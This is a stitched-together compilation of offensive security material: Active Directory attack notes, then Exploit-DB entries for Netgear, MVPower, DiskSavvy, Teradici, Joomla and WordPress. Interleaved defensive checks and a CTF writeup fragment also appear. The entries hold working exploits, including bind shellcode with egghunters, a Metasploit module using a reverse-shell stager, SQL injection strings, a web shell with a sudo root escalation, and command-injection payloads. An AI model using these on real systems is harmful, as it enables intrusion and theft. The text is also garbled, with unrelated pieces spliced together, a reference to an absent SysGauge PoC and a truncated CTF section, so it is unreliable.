Step 1. Get the SID (PowerView module): Convert-NameToSid uknowsec.cn\krbtgt
Step 2. kerberos::golden /admin:Administrator /domain:news.uknowsec.cn /sid:xxx(child-domain-SID) /sids:xxx-519 /krbtgt:xxx /startoffset:0 /endin:600 /renewmax:10080 /ptt
Backdoor use of Kerberoasting
privilege::debug
misc::skeleton
Golden ticket
Silver tickets
Query the three types of delegation information
StandIn.exe --delegation
Or with PowerView, unconstrained delegation:
After loading the PowerView script with Import-Module PowerView.ps1, query with the following commands.
Query accounts configured with unconstrained delegation in the domain:
Get-NetUser -Unconstrained -Domain rootkit.org
Query hosts configured with unconstrained delegation in the domain:
Get-NetComputer -Unconstrained -Domain rootkit.org
Constrained delegation
Query accounts configured with constrained delegation in the domain:
Get-DomainUser -TrustedToAuth-
import socket
# Title: BlueIris - Denial of Service
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://blueirissoftware.com/blueiris.exe
# Version: 4.5.1.4
# Tested on: Windows Server 2008 R2 Standard x64
# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.
buffer = "A"*5000
port = 21
s = socket.socket()
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print 'Listening on FTP port: '+str(port)
while True:
    conn, addr = s.accept()
    conn.send('220 '+buffer+'\r\n')
    conn.recv(1024)
    conn.send('250 '+buffer+'\r\n')
    conn.close()
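The SysGauge and BlueIris PoCs above both hand the client an oversized 220 greeting. The defensive counterpart, added here as an example and not part of either PoC, is a reply parser that enforces the RFC 5321 512-octet line limit before a line is decoded or copied anywhere; the same bound is applied to FTP replies as policy, which is an assumption of this example.

```python
from typing import List, Tuple

# RFC 5321 section 4.5.3.1.5 caps an SMTP reply line at 512 octets including CRLF.
# The FTP reply grammar has no hard cap, so the same bound is applied there as policy.
MAX_REPLY_LINE = 512
MAX_REPLY_LINES = 64  # cap on continuation lines so a server cannot stream forever


class ReplyError(ValueError):
    """Raised for replies a hardened client must refuse before any further parsing."""


def parse_reply(buf: bytes, limit: int = MAX_REPLY_LINE) -> Tuple[int, List[str], bytes]:
    """Parse one complete (possibly multi-line) reply at the head of buf.

    Returns (code, text_lines, remaining_bytes). The length check happens before
    the line is decoded, so an oversized banner never reaches a fixed-size buffer.
    """
    lines: List[str] = []
    code = None
    rest = buf
    while True:
        end = rest.find(b"\r\n", 0, limit)  # never scan past the cap
        if end < 0:
            raise ReplyError("reply line exceeds %d bytes or is incomplete" % limit)
        line, rest = rest[:end], rest[end + 2:]
        if len(line) < 3 or not line[:3].isdigit():
            raise ReplyError("reply does not start with a 3-digit code")
        if code is None:
            code = int(line[:3])
        elif int(line[:3]) != code:
            raise ReplyError("continuation line changes the reply code")
        sep = line[3:4]
        if sep not in (b"", b" ", b"-"):
            raise ReplyError("bad separator after the reply code")
        lines.append(line[4:].decode("ascii", "replace"))
        if len(lines) > MAX_REPLY_LINES:
            raise ReplyError("too many continuation lines")
        if sep != b"-":  # '-' marks a multi-line reply; anything else ends it
            return code, lines, rest


def greeting_accepted(buf: bytes) -> bool:
    """True only for a well-formed service-ready (220) greeting within the limits."""
    try:
        code, _lines, _rest = parse_reply(buf)
    except ReplyError:
        return False
    return code == 220
```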
# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4
# CVE: CVE-2017-6366
A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, it allows unauthenticated (sic!) RCE after tricking somebody who is logged in to the router into viewing a website.
<!DOCTYPE html>
<html>
<title>netgear router CSRF</title>
<body>
<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
<input type="hidden" name="lookup" value="Lookup">
<button name="clc" value="clc">Would You Dare To?</button>
</form>
</body>
</html>
<!-- 2017-02-27 by SivertPL -->
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MVPower DVR Shell Unauthenticated Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated remote command execution
        vulnerability in MVPower digital video recorders. The 'shell' file
        on the web interface executes arbitrary operating system commands in
        the query string.

        This module was tested successfully on a MVPower model TV-7104HE with
        firmware version 1.8.4 115215B9 (Build 2014/11/17).

        The TV-7108HE model is also reportedly affected, but untested.
      },
      'Author'         =>
        [
          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'References'     =>
        [
          # Comment from Paul Davies contains probably the first published PoC
          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
          # Writeup with PoC by Andrew Tierney from Pen Test Partners
          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
        ],
      'DisclosureDate' => 'Aug 23 2015',
      'Privileged'     => true, # BusyBox
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' =>
        {
          'PAYLOAD'           => 'linux/armle/mettle_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget'
        },
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'CmdStagerFlavor' => %w{ echo printf wget },
      'DefaultTarget'  => 0))
  end

  def check
    begin
      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
      res = send_request_cgi(
        'uri' => "/shell?echo+#{fingerprint}",
        'headers' => { 'Connection' => 'Keep-Alive' }
      )
      if res && res.body.include?(fingerprint)
        return CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return CheckCode::Unknown
    end
    CheckCode::Safe
  end

  def execute_command(cmd, opts)
    begin
      send_request_cgi(
        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
        'headers' => { 'Connection' => 'Keep-Alive' }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def exploit
    print_status("#{peer} - Connecting to target")
    unless check == CheckCode::Vulnerable
      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
    end
    print_good("#{peer} - Target is vulnerable!")
    execute_cmdstager(linemax: 1500)
  end
end
# # # # #
# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_onevote
# Date: 27.02.2017
# Vendor Homepage: http://advcomsys.com/
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
# Demo: http://advcomsys.com/index.php/joomla-demos/elections
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
# +/*!50000union*/+select+@@version-- -
# # # # #
1. Base16 decoding
Problem name: base64÷4. Problem attachment: https://adworld.xctf.org.cn/media/task/attachments/C8CB2B557B57475D8EC1EDED36E819AC4D.TXT
Problem writeup:
1. From the problem title, the guess is base16.
2. The answer can be obtained by decoding online with Base16: https://www.qxiuzi.cn/bianma/base.php?type=16
3. Decoding script:
import base64
s = '666C61677B453333423746444384133423834314341393639394544444444241323442363041417D'
flag = base64.b16decode(s)
print flag
4. The final flag: flag{e33b7fd8a3b841ca9699eddba24b60aa}
2. Modbus industrial protocol traffic capture analysis
Title: magic modbus. Problem description: find the flag, in the format sctf{xxx}. Attachment: https://adworld.xctf.org.cn/media/task/Attachments/22FC3D84E8434AED89CBC0BBD95A07B4.PCAPNG
Basic knowledge: Modbus is a serial communication protocol. Modbus has become the de facto industry standard communication protocol in the industrial sector and is now a commonly used way of connecting industrial electronic devices.
Problem writeup:
1. Searching for the string keyword "flag" finds nothing.
2. Searching for the keyword "sctf" shows the sctf format.
The result is: sctf{easy_mdbus}, and submitting it gives an error.
Going by the "modbus" keyword in the title name, one character may be missing from the traffic capture in the attachment. Submit the flag.
3. Analysis of the HTTP protocol in a traffic capture
Problem name: wireshark-1. Problem description: A hacker captured, via wireshark, the traffic of an administrator logging in to a website (the administrator's password is the answer). The flag submission format is flag{xxxx}. Attachment: https://adworld.xctf.org.cn/media/task/attachments/ab8cfea4444444444d4d8bd96c7f769ce1309.zip
Problem writeup:
1. Open the traffic capture with Wireshark, filter on the HTTP protocol, and find the POST data packet.
2. Follow stream: HTTP stream.
3. The value of the password keyword submitted in the POST, i.e. the answer, is the flag.
4. The final flag is: Flag{FFB7567A1D4F4F4ABDFFDB54E022F8FACD}
IV. Image writeup
Problem name: Pure_Color. Problem description: the format is flag{{
# # # # #
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
# Date: February 22nd, 2017
# Exploit Author: hantwister
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
# Version: 2.2.0
Users who can access the Settings > Database Management page can achieve code
execution as root on older versions of PCoIP MC 2.x (the appliance is based on CentOS 7 x64).
Web Shell Upload Vulnerability Overview
---------------------------------------
Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
malicious archive with a malicious web script that extracts to the known
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
it is possible to add or modify class files and XML files pertaining to the
application.
Privilege Escalation Vulnerability Overview
-------------------------------------------
The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
has sudo rights to run that file without a password. By manipulating this file,
arbitrary code can be run as root.
Exploiting The Vulnerabilities
------------------------------
alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~$ cd runasroot
alice:~/runasroot$ msfvenom (snip) > evil
alice:~/runasroot$ chmod a+x evil
alice:~/runasroot$ nano modify_self_restart.sh
#!/bin/bash
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
alice:~/runasroot$ chmod a+x modify_self_restart.sh
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
<html>
<head>
<title>runasroot</title>
</head>
<body>
<pre>
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
</pre>
</body>
</html>
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
Now upload runasroot.archive through the Database Management page. An error will
be displayed saying it was not a valid archive. Then navigate to
https://IP/console/images/runasroot.gsp
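An added audit check (example code, not Teradici's) for the privilege-escalation condition described above: a passwordless sudo rule whose target script is writable by the very account allowed to sudo it. The sudoers lines and file metadata below are constructed samples; nothing is read from disk.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class FileMeta:
    """Subset of stat() output the check needs (constructed, not read from disk)."""
    owner: str
    group: str
    mode: int  # permission bits, e.g. 0o755


# Constructed stand-in for stat() on the audited host. The first entry mirrors the
# advisory: the restart script is owned by the jetty account that may sudo it.
SAMPLE_FILES = {
    "/opt/jetty/jetty_self_restart.sh": FileMeta("jetty", "jetty", 0o755),
    "/usr/sbin/service": FileMeta("root", "root", 0o755),
}

# Constructed sudoers fragment in standard syntax: user host=(runas) tag: command
SAMPLE_SUDOERS = """\
# Jetty restart helper
jetty ALL=(root) NOPASSWD: /opt/jetty/jetty_self_restart.sh
webadmin ALL=(root) NOPASSWD: /usr/sbin/service httpd restart
"""

RULE_RE = re.compile(r"^(\S+)\s+\S+=\((\S+)\)\s+(NOPASSWD:\s*)?(.+)$")


def parse_sudoers(text):
    """Yield (user, runas, nopasswd, [command paths]) for each rule line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, runas, nopass, cmds = m.groups()
        # Commands may be comma separated and carry arguments; keep the path only.
        paths = [c.strip().split()[0] for c in cmds.split(",") if c.strip()]
        yield user, runas, nopass is not None, paths


def user_can_write(user, meta, groups_of):
    """True if `user` can modify the file described by `meta`.
    groups_of maps a user name to the set of groups it belongs to."""
    if meta.owner == user and meta.mode & 0o200:
        return True
    if meta.group in groups_of.get(user, ()) and meta.mode & 0o020:
        return True
    return bool(meta.mode & 0o002)  # world-writable


def find_writable_sudo_targets(sudoers_text, files, groups_of):
    """Return (user, runas, path, nopasswd) for every rule whose target the sudoing
    user can edit: such a rule hands that user the runas identity outright."""
    findings = []
    for user, runas, nopass, paths in parse_sudoers(sudoers_text):
        for p in paths:
            meta = files.get(p)
            if meta is not None and user_can_write(user, meta, groups_of):
                findings.append((user, runas, p, nopass))
    return findings
```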
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
Mail-Masta SQL Injection
Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
GET Parameter: list_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
csvexport.php:
$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);
Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
GET Parameter: filter_list
http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
view-list.php:
global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
POST Parameter: camp_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
count_of_send.php:
include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
POST Parameter: list_id
campaign_save.php:
$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
...snip...
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
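An added static check (example code, not the plugin's) for the pattern behind these findings, including the view-list.php case where $wpdb->prepare() is called but the variable is already interpolated into the format string, so the placeholder mechanism never sees it. The sample PHP lines are constructed from the snippets above plus one hardened rewrite that uses a %d placeholder.

```python
import re

METHODS = r"get_results|get_var|get_row|get_col|query"
DQ = r'"(?P<sql>(?:[^"\\]|\\.)*)"'  # one double-quoted PHP string literal
# $wpdb->get_var("...") or $wpdb->get_var($wpdb->prepare("...", ...))
LITERAL_CALL_RE = re.compile(
    r"\$wpdb->(?P<method>" + METHODS + r")\s*\(\s*"
    r"(?P<prep>\$wpdb->prepare\s*\(\s*)?" + DQ)
# Query kept in a variable first: $check_sql = "..."; $wpdb->get_results($check_sql)
STR_ASSIGN_RE = re.compile(r"\$(?P<var>\w+)\s*=\s*" + DQ)
VAR_CALL_RE = re.compile(r"\$wpdb->(?P<method>" + METHODS + r")\s*\(\s*\$(?P<var>\w+)\s*\)")
PREFIX_RE = re.compile(r"\$(?P<var>\w+)\s*=\s*\$wpdb->prefix")
INTERP_RE = re.compile(r"\{?\$(?P<var>[A-Za-z_]\w*)\}?")  # "$x" or "{$x}" inside a string

# Constructed from the advisory's snippets; the last line is a hardened rewrite
# that passes the value through a %d placeholder instead of interpolating it.
SAMPLE_PHP = r"""
$list_id=$_GET['list_id'];
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$masta_reports = $wpdb->prefix . "masta_reports";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$wp_list=$wpdb->get_results($check_sql);
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$camp_id=$_POST['camp_id'];
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
$safe = $wpdb->get_var( $wpdb->prepare("SELECT count(id) FROM wp_masta_subscribers where list_id=%d", $list_id));
"""


def scan_php(source):
    """Return (line, method, variable, kind) for each PHP variable that ends up
    interpolated into SQL executed through $wpdb. kind is "raw" when no prepare()
    is involved and "prepare-bypass" when prepare() receives a format string that
    already contains the variable."""
    lines = source.splitlines()
    table_vars, sql_vars = set(), {}
    for line in lines:  # first pass: table-name variables and stored query strings
        table_vars.update(m.group("var") for m in PREFIX_RE.finditer(line))
        sql_vars.update((m.group("var"), m.group("sql")) for m in STR_ASSIGN_RE.finditer(line))
    findings = []
    for lineno, line in enumerate(lines, 1):
        queries = []
        m = LITERAL_CALL_RE.search(line)
        if m:
            kind = "prepare-bypass" if m.group("prep") else "raw"
            queries.append((m.group("method"), m.group("sql"), kind))
        for m in VAR_CALL_RE.finditer(line):
            if m.group("var") in sql_vars:
                queries.append((m.group("method"), sql_vars[m.group("var")], "raw"))
        for method, sql, kind in queries:
            for v in INTERP_RE.finditer(sql):
                name = v.group("var")
                if name not in table_vars:  # names built from $wpdb->prefix are not user input
                    findings.append((lineno, method, name, kind))
    return findings
```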
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
import socket
import sys
try:
    host = sys.argv[1]
    os = sys.argv[2]
    port = 80
except IndexError:
    print "[+] Usage %s <host> win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"
if os == "win7":
    wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
                       "\x33\xd2"
                       "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
                       "\x2e\x5a\x3c\x05\x74\xef\xb8"
                       "\x74\x30\x30\x77"
                       "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
                       "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
elif os == "win10":
    wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
                       "\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
                       "\x74\x30\x30\x77"
                       "\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
                       "\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
else:
    print "[!] This windows version is not supported yet"
    exit(0)
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
# Exploit Title: Shutter user-assisted remote code execution
# Date: 2016-12-26
# Software Link: http://shutter-project.org/
# Version: 0.93.1
# Tested on: Ubuntu, Debian
# Exploit Author: Prajith P
# Website: http://prajith.in/
# Author Mail: me@prajith.in
# CVE: CVE-2016-10081
1. Description.
/usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
attackers to execute arbitrary commands via a crafted image name that is
mishandled during a "Run a plugin" action.
2. Proof of concept.
1) Rename an image to something like "$(firefox)"
2) Open the renamed file in shutter
3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
3. Solution:
https://bugs.launchpad.net/shutter/+bug/1652600
Thanks,
Prajithh
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=671328
PoC:
-->
<style>
content { contain: size layout; }
</style>
<script>
function leak() {
    document.execCommand("selectAll");
    opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
<!--
Since this is a layout bug, AFAIK the leaked data can't be obtained via DOM calls; however, it is possible to obtain it using tricks like the unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach), which is likely sufficient to turn this into an ASLR bypass.
-->
# # # # #
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
